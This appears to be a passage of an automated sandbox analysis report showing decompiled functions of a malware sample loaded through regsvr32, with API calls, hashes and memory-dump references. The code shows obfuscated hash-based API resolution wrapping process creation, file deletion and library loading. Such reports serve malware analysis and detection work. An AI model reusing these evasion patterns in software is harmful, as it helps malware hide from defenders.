                                                                                                                0x0029e3bc
                                                                                                                0x0029e3c3
                                                                                                                0x0029e3cf
                                                                                                                0x0029e3d5
                                                                                                                0x0029e3d8
                                                                                                                0x0029e3df
                                                                                                                0x0029e3e6
                                                                                                                0x0029e3ed
                                                                                                                0x0029e3f4
                                                                                                                0x0029e40b
                                                                                                                0x0029e413
                                                                                                                0x0029e426
                                                                                                                0x0029e42f
                                                                                                                0x0029e435

                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00293F2A,00000000), ref: 0029E42F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID: M8
                                                                                                                • API String ID: 2962429428-669864304
                                                                                                                • Opcode ID: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
                                                                                                                • Instruction ID: 9438e68d86052ed98a0c32da5f9a635733fcc266b86faeb3d92ca123c8057eb9
                                                                                                                • Opcode Fuzzy Hash: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
                                                                                                                • Instruction Fuzzy Hash: 7D1159B5D10209FFDF58DFA4C94989EBBB4EB40324F108299E824B6290D7B55B158F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 002946E0 Relevance: 1.6, APIs: 1, Instructions: 76processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 43%
                                                                                                                			E002946E0(void* __ecx, struct _PROCESS_INFORMATION* __edx, long _a8, intOrPtr _a12, struct _STARTUPINFOW* _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a40, intOrPtr _a44, int _a48, intOrPtr _a56, intOrPtr _a60, WCHAR* _a64, intOrPtr _a68) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				int _t64;
				signed int _t66;
				struct _PROCESS_INFORMATION* _t72;

				_push(_a68);
				_t72 = __edx;
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E00289E7D(_t55);
				_v8 = 0x728488;
				_v8 = _v8 + 0x86b5;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xe7c2;
				_v8 = _v8 ^ 0x98526b3c;
				_v16 = 0xdd86ac;
				_v16 = _v16 | 0x9093749e;
				_v16 = _v16 + 0x773d;
				_v16 = _v16 ^ 0x90e3102d;
				_v20 = 0xa04379;
				_v20 = _v20 + 0xe8c2;
				_v20 = _v20 ^ 0x00a70f96;
				_v12 = 0x20815c;
				_t66 = 0x4c;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xbbf973da;
				_v12 = _v12 ^ 0xbbf5b48f;
				E0029BFF0(0xac802c42, 0x58, _t66, _t66, 0xb43c22a7);
				_t64 = CreateProcessW(_a64, _a40, 0, 0, _a48, _a8, 0, 0, _a16, _t72); // executed
				return _t64;
			}











                                                                                                                0x002946e8
                                                                                                                0x002946ed
                                                                                                                0x002946ef
                                                                                                                0x002946f2
                                                                                                                0x002946f5
                                                                                                                0x002946f8
                                                                                                                0x002946f9
                                                                                                                0x002946fc
                                                                                                                0x002946ff
                                                                                                                0x00294702
                                                                                                                0x00294703
                                                                                                                0x00294706
                                                                                                                0x00294709
                                                                                                                0x0029470c
                                                                                                                0x0029470d
                                                                                                                0x00294710
                                                                                                                0x00294713
                                                                                                                0x00294716
                                                                                                                0x00294717
                                                                                                                0x00294719
                                                                                                                0x0029471e
                                                                                                                0x00294727
                                                                                                                0x0029472e
                                                                                                                0x00294732
                                                                                                                0x00294739
                                                                                                                0x00294740
                                                                                                                0x00294747
                                                                                                                0x0029474e
                                                                                                                0x00294755
                                                                                                                0x0029475c
                                                                                                                0x00294763
                                                                                                                0x0029476a
                                                                                                                0x00294771
                                                                                                                0x0029477d
                                                                                                                0x00294783
                                                                                                                0x00294786
                                                                                                                0x0029478d
                                                                                                                0x002947ae
                                                                                                                0x002947ca
                                                                                                                0x002947d1

                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,90E3102D,00000000,00000000,00000000), ref: 002947CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
                                                                                                                • Instruction ID: 269b59916201d1e24b09adaaed31c08dff0b1240df90314d426221e4d5214109
                                                                                                                • Opcode Fuzzy Hash: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
                                                                                                                • Instruction Fuzzy Hash: CA31F272900248FBDF559F95DD09CDEBF76FB89314F008188FA2462160D7B69A60EF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0029BF1C Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 55%
                                                                                                                			E0029BF1C(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, WCHAR* _a20, long _a24, long _a36, intOrPtr _a40) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				void* _t55;
				long _t60;

				_push(_a40);
				_t60 = __edx;
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00289E7D(_t47);
				_v20 = 0x8eb723;
				_v20 = _v20 + 0xdb15;
				_v20 = _v20 ^ 0x00852a30;
				_v16 = 0x113147;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x0008263d;
				_v12 = 0x276480;
				_v12 = _v12 + 0x6f6f;
				_v12 = _v12 | 0x7ba60f09;
				_v12 = _v12 * 0x1e;
				_v12 = _v12 ^ 0x7da9aca6;
				_v8 = 0x62f42b;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000dc6a5;
				E0029BFF0(0xac802c42, 0xfa, __ecx, __ecx, 0xbf3d9e5c);
				_t55 = CreateFileW(_a20, _a36, _a12, 0, _t60, _a24, 0); // executed
				return _t55;
			}










                                                                                                                0x0029bf24
                                                                                                                0x0029bf29
                                                                                                                0x0029bf2b
                                                                                                                0x0029bf2e
                                                                                                                0x0029bf2f
                                                                                                                0x0029bf30
                                                                                                                0x0029bf33
                                                                                                                0x0029bf36
                                                                                                                0x0029bf39
                                                                                                                0x0029bf3c
                                                                                                                0x0029bf3f
                                                                                                                0x0029bf42
                                                                                                                0x0029bf43
                                                                                                                0x0029bf44
                                                                                                                0x0029bf49
                                                                                                                0x0029bf53
                                                                                                                0x0029bf5a
                                                                                                                0x0029bf61
                                                                                                                0x0029bf68
                                                                                                                0x0029bf6c
                                                                                                                0x0029bf70
                                                                                                                0x0029bf77
                                                                                                                0x0029bf7e
                                                                                                                0x0029bf85
                                                                                                                0x0029bf9c
                                                                                                                0x0029bfa4
                                                                                                                0x0029bfab
                                                                                                                0x0029bfb2
                                                                                                                0x0029bfb6
                                                                                                                0x0029bfba
                                                                                                                0x0029bfbe
                                                                                                                0x0029bfd1
                                                                                                                0x0029bfe8
                                                                                                                0x0029bfef

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,00852A30,00000000,00050E56,?,00000000), ref: 0029BFE8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
                                                                                                                • Instruction ID: 81191f358b7e4b870692533ca05ca98a7dddaca6de247871ec78f55bd9d2aee5
                                                                                                                • Opcode Fuzzy Hash: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
                                                                                                                • Instruction Fuzzy Hash: D221057681020DBBCF15DF96D9098DFBFB5FB84748F008198F925A2220D3B28A64DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00291B22 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00291B22(long __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t44;
				void* _t55;
				signed int _t57;
				void* _t62;
				long _t63;

				_push(_a16);
				_t62 = __edx;
				_t63 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00289E7D(_t44);
				_v12 = 0x22ab7;
				_t57 = 0x25;
				_v12 = _v12 * 0x37;
				_v12 = _v12 / _t57;
				_v12 = _v12 + 0xd1d9;
				_v12 = _v12 ^ 0x00090b04;
				_v16 = 0xc8cc57;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xffff2520;
				_v16 = _v16 ^ 0xfffe92e9;
				_v20 = 0xc52a4b;
				_v20 = _v20 | 0xae757bf4;
				_v20 = _v20 ^ 0xaef18991;
				_v8 = 0xf15120;
				_v8 = _v8 ^ 0xeebb54a4;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x37;
				_v8 = _v8 ^ 0xf39e7cda;
				E0029BFF0(0xac802c42, 0xa7, _t57, _t57, 0x96a08a4a);
				_t55 = RtlAllocateHeap(_t62, _t63, _a8); // executed
				return _t55;
			}












                                                                                                                0x00291b2a
                                                                                                                0x00291b2d
                                                                                                                0x00291b2f
                                                                                                                0x00291b31
                                                                                                                0x00291b34
                                                                                                                0x00291b37
                                                                                                                0x00291b3a
                                                                                                                0x00291b3b
                                                                                                                0x00291b3c
                                                                                                                0x00291b41
                                                                                                                0x00291b50
                                                                                                                0x00291b54
                                                                                                                0x00291b61
                                                                                                                0x00291b64
                                                                                                                0x00291b6b
                                                                                                                0x00291b72
                                                                                                                0x00291b79
                                                                                                                0x00291b7d
                                                                                                                0x00291b84
                                                                                                                0x00291b8b
                                                                                                                0x00291b92
                                                                                                                0x00291b99
                                                                                                                0x00291ba0
                                                                                                                0x00291ba7
                                                                                                                0x00291bae
                                                                                                                0x00291bc2
                                                                                                                0x00291bc5
                                                                                                                0x00291bd8
                                                                                                                0x00291be5
                                                                                                                0x00291bec

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,005D2A08,FFFE92E9,?,?,?,?,?,?,?,?,00E39F9A,?), ref: 00291BE5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
                                                                                                                • Instruction ID: 09ebfe7314d2d8204020d61ddbba39493043075168e15297450f077313076f27
                                                                                                                • Opcode Fuzzy Hash: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
                                                                                                                • Instruction Fuzzy Hash: 7D2163B5C00208FBCF05DFA4C94A8EEBFB4FB80314F108089E810A6261D3B45B51DF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 002966C2 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E002966C2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				intOrPtr* _t45;
				void* _t46;
				void* _t51;

				_t51 = __edx;
				E00289E7D(_t39);
				_v12 = 0xe2acc8;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xbe17;
				_v12 = _v12 ^ 0x0011993b;
				_v20 = 0xf2f568;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0xbd5142c5;
				_v8 = 0x6d1128;
				_v8 = _v8 + 0xffff2279;
				_v8 = _v8 << 3;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x19de445b;
				_v16 = 0xb26540;
				_v16 = _v16 + 0xffff3889;
				_v16 = _v16 ^ 0x00b459c6;
				_t45 = E0029BFF0(0xee7aaf55, 0x326, __ecx, __ecx, 0x1d46c800);
				_t46 =  *_t45(0, _a20, 0, _a8, _t51, __ecx, __edx, _a4, _a8, 0, 0, _a20, _a24, _a28, _a32); // executed
				return _t46;
			}











                                                                                                                0x002966cf
                                                                                                                0x002966e4
                                                                                                                0x002966e9
                                                                                                                0x002966f3
                                                                                                                0x002966f7
                                                                                                                0x002966fe
                                                                                                                0x00296705
                                                                                                                0x0029670c
                                                                                                                0x00296710
                                                                                                                0x00296717
                                                                                                                0x0029671e
                                                                                                                0x00296725
                                                                                                                0x00296729
                                                                                                                0x0029672d
                                                                                                                0x00296734
                                                                                                                0x0029673b
                                                                                                                0x00296742
                                                                                                                0x00296766
                                                                                                                0x00296777
                                                                                                                0x0029677e

                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,060C7659,00000000,00B459C6,?), ref: 00296777
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
                                                                                                                • Instruction ID: c93244d2a0459081b3655f8575f455805b71dd93837220ff5d17d38fea2e9722
                                                                                                                • Opcode Fuzzy Hash: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
                                                                                                                • Instruction Fuzzy Hash: FD1144B2800208FBCF15DF95CC0A8DEBFB4EF85704F108198F92962210D3B18A64DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0028FCB5 Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E0028FCB5(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t36;
				struct HINSTANCE__* _t47;
				signed int _t49;
				signed int _t50;
				WCHAR* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E00289E7D(_t36);
				_v20 = 0x4781cd;
				_t49 = 7;
				_v20 = _v20 / _t49;
				_v20 = _v20 ^ 0x0004a997;
				_v8 = 0x9f6121;
				_v8 = _v8 | 0x04abbfea;
				_v8 = _v8 ^ 0x44133d53;
				_v8 = _v8 ^ 0x40a32c45;
				_v16 = 0x791f5b;
				_t50 = 0x6e;
				_v16 = _v16 / _t50;
				_v16 = _v16 ^ 0x000d135a;
				_v12 = 0x90c5d0;
				_v12 = _v12 ^ 0x2cafc93f;
				_v12 = _v12 ^ 0x2c381e09;
				E0029BFF0(0xac802c42, 0x347, _t50, _t50, 0xede26741);
				_t47 = LoadLibraryW(_t57); // executed
				return _t47;
			}












                                                                                                                0x0028fcbc
                                                                                                                0x0028fcbf
                                                                                                                0x0028fcc1
                                                                                                                0x0028fcc3
                                                                                                                0x0028fcc8
                                                                                                                0x0028fcd6
                                                                                                                0x0028fcdb
                                                                                                                0x0028fce0
                                                                                                                0x0028fce7
                                                                                                                0x0028fcee
                                                                                                                0x0028fcf5
                                                                                                                0x0028fcfc
                                                                                                                0x0028fd03
                                                                                                                0x0028fd0d
                                                                                                                0x0028fd13
                                                                                                                0x0028fd16
                                                                                                                0x0028fd1d
                                                                                                                0x0028fd24
                                                                                                                0x0028fd2b
                                                                                                                0x0028fd4f
                                                                                                                0x0028fd58
                                                                                                                0x0028fd5e

                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 0028FD58
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
                                                                                                                • Instruction ID: b3d3b15d16d69d53da9d93f1a2e83b1054c8ee2494542f8c0028b69fb268d92f
                                                                                                                • Opcode Fuzzy Hash: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
                                                                                                                • Instruction Fuzzy Hash: A3115A71E00208FBDB08DFA5C84A8EEBFB5EB40304F108189E429A6251DBB56B208F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00289EA8 Relevance: 1.5, APIs: 1, Instructions: 44fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E00289EA8(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t35;
				int _t42;
				WCHAR* _t46;

				_push(_a8);
				_t46 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00289E7D(_t35);
				_v20 = 0xb0cce;
				_v20 = _v20 + 0xffff00ee;
				_v20 = _v20 ^ 0x0007bd05;
				_v12 = 0x1e8fca;
				_v12 = _v12 >> 6;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0xffff1da9;
				_v12 = _v12 ^ 0x0077171f;
				_v16 = 0xc679b7;
				_v16 = _v16 + 0x38bf;
				_v16 = _v16 ^ 0x00cf762a;
				_v8 = 0xa3ba51;
				_v8 = _v8 ^ 0xa0d3ead1;
				_v8 = _v8 + 0xe688;
				_v8 = _v8 + 0xffff6d73;
				_v8 = _v8 ^ 0xa079263d;
				E0029BFF0(0xac802c42, 0x385, __ecx, __ecx, 0x77e9f533);
				_t42 = DeleteFileW(_t46); // executed
				return _t42;
			}










                                                                                                                0x00289eaf
                                                                                                                0x00289eb2
                                                                                                                0x00289eb4
                                                                                                                0x00289eb8
                                                                                                                0x00289eb9
                                                                                                                0x00289ebe
                                                                                                                0x00289ec8
                                                                                                                0x00289ecf
                                                                                                                0x00289ed6
                                                                                                                0x00289edd
                                                                                                                0x00289ee1
                                                                                                                0x00289ee5
                                                                                                                0x00289eec
                                                                                                                0x00289ef3
                                                                                                                0x00289efa
                                                                                                                0x00289f01
                                                                                                                0x00289f08
                                                                                                                0x00289f0f
                                                                                                                0x00289f16
                                                                                                                0x00289f1d
                                                                                                                0x00289f24
                                                                                                                0x00289f48
                                                                                                                0x00289f51
                                                                                                                0x00289f57

                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00E39F9E,00000000), ref: 00289F51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 4033686569-0
                                                                                                                • Opcode ID: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
                                                                                                                • Instruction ID: 89820bda33576b201b5b8ab31e531637050b438ca83cad832bca5afba4b65687
                                                                                                                • Opcode Fuzzy Hash: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
                                                                                                                • Instruction Fuzzy Hash: 0D1118B2C11619FBDF48DFA4D94A8DEBBB4EF10318F108288E825A6250E7B45B548F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0028BA9C Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E0028BA9C(int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t34;

				_v20 = 0x6b4597;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x00116e69;
				_v16 = 0x7d3df7;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x03ee9fa4;
				_v12 = 0x7e0c35;
				_v12 = _v12 ^ 0xa2581e84;
				_v12 = _v12 ^ 0xa22bc007;
				_v8 = 0xada9ee;
				_push(_t34);
				_v8 = _v8 * 0x61;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x6b103fde;
				E0029BFF0(0xac802c42, 0x166, _t34, _t34, 0x80a33dd2);
				ExitProcess(_a12);
			}








                                                                                                                0x0028baa2
                                                                                                                0x0028baa9
                                                                                                                0x0028baad
                                                                                                                0x0028bab4
                                                                                                                0x0028babb
                                                                                                                0x0028babf
                                                                                                                0x0028bac6
                                                                                                                0x0028bacd
                                                                                                                0x0028bad4
                                                                                                                0x0028badb
                                                                                                                0x0028bae6
                                                                                                                0x0028baee
                                                                                                                0x0028baf6
                                                                                                                0x0028bafa
                                                                                                                0x0028bb12
                                                                                                                0x0028bb1d

                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00116E69), ref: 0028BB1D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 621844428-0
                                                                                                                • Opcode ID: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
                                                                                                                • Instruction ID: f26032b5fc0b3d5b0b82d43d30dc9210e7040fc29b9e93a42d8f1da50df0ff8f
                                                                                                                • Opcode Fuzzy Hash: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
                                                                                                                • Instruction Fuzzy Hash: CD0100B5D1120CEB8F08DFA8DA4A9DEBBB4FB04348F108699E821B7211D7B55B14CF81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 0029AA52 Relevance: .0, Instructions: 2COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0029AA52() {

				return  *[fs:0x30];
			}



                                                                                                                0x0029aa58

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:16.7%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1056
                                                                                                                Total number of Limit Nodes:17
